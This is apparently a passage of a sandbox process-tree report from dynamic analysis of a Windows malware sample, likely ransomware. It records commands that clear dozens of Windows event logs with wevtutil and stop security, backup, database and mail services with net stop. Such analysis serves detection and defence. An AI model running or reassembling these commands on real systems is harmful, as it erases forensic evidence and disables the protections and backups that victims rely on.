  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    - Clears Windows event logs
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "mfemms"
  C:\Windows\system32\net.exe | net stop "mfemms"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "mfemms"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "mfevtp"
  C:\Windows\system32\net.exe | net stop "mfevtp"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "mfevtp"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MMS"
  C:\Windows\system32\net.exe | net stop "MMS"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MMS"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
  C:\Windows\system32\net.exe | net stop "mozyprobackup"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "mozyprobackup"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
  C:\Windows\system32\net.exe | net stop "MsDtsServer"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MsDtsServer"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
  C:\Windows\system32\net.exe | net stop "MsDtsServer100"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MsDtsServer100"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
  C:\Windows\system32\net.exe | net stop "MsDtsServer110"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MsDtsServer110"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
  C:\Windows\system32\net.exe | net stop "MSExchangeES"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeES"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
  C:\Windows\system32\net.exe | net stop "MSExchangeIS"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeIS"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
  C:\Windows\system32\net.exe | net stop "MSExchangeMGMT"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeMGMT"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
  C:\Windows\system32\net.exe | net stop "MSExchangeMTA"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeMTA"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
  C:\Windows\system32\net.exe | net stop "MSExchangeSA"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeSA"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
  C:\Windows\system32\net.exe | net stop "MSExchangeSRS"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSExchangeSRS"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
  C:\Windows\system32\net.exe | net stop "MSOLAP$SQL_2008"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
  C:\Windows\system32\net.exe | net stop "MSOLAP$SYSTEM_BGC"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
  C:\Windows\system32\net.exe | net stop "MSOLAP$TPS"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$TPS"
C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
  C:\Windows\system32\net.exe | net stop "MSOLAP$TPSAMA"
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLSERVER"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLSERVER"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerOLAPService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerOLAPService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL80"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL80"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL80"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MySQL57"3⤵
-
C:\Windows\system32\net.exenet stop "MySQL57"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MySQL57"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"3⤵
-
C:\Windows\system32\net.exenet stop "OracleClientCache80"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "OracleClientCache80"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "PDVFSService"3⤵
-
C:\Windows\system32\net.exenet stop "PDVFSService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PDVFSService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "POP3Svc"3⤵
-
C:\Windows\system32\net.exenet stop "POP3Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "POP3Svc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"3⤵
-
C:\Windows\system32\net.exenet stop "RESvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"3⤵
-
C:\Windows\system32\net.exenet stop "sacsvr"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"3⤵
-
C:\Windows\system32\net.exenet stop "SamSs"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVAdminService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"3⤵
-
C:\Windows\system32\net.exenet stop "SAVService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"3⤵
-
C:\Windows\system32\net.exenet stop "Smcinst"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"3⤵
-
C:\Windows\system32\net.exenet stop "SmcService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"3⤵
-
C:\Windows\system32\net.exenet stop "SMTPSvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"3⤵
-
C:\Windows\system32\net.exenet stop "SNAC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"3⤵
-
C:\Windows\system32\net.exenet stop "SntpService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"3⤵
-
C:\Windows\system32\net.exenet stop "sophossps"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"3⤵
-
